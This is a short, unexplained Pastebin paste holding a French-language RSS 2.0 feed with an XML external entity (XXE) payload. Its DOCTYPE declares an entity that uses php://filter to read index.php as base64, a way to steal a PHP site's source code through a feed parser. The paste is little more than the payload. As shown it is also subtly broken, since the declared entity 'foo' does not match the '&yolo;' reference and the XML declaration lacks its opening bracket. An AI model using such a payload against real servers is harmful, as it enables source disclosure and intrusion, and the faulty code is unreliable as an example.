Advertisement
Guest User

Untitled

a guest
Apr 24th, 2017
57
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.93 KB | None | 0 0
  1. ?xml version="1.0" encoding="ISO-8859-1"?>
  2. <!DOCTYPE foo [
  3. <!ENTITY foo SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">
  4. ]>
  5. <rss version="2.0">
  6. <channel>
  7. <title>Mon site</title>
  8. <description>Ceci est un exemple de flux RSS 2.0</description>
  9. <lastBuildDate>Sat, 07 Sep 2002 00:00:01 GMT</lastBuildDate>
  10. <link>http://www.example.org</link>
  11. <item>
  12. <title>&yolo;</title>
  13. <description>Ceci est ma première actualité</description>
  14. <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
  15. <link>http://www.example.org/actu1</link>
  16. </item>
  17. <item>
  18. <title>Actualité N°2</title>
  19. <description>Ceci est ma seconde actualité</description>
  20. <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
  21. <link>http://www.example.org/actu2</link>
  22. </item>
  23. </channel>
  24. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement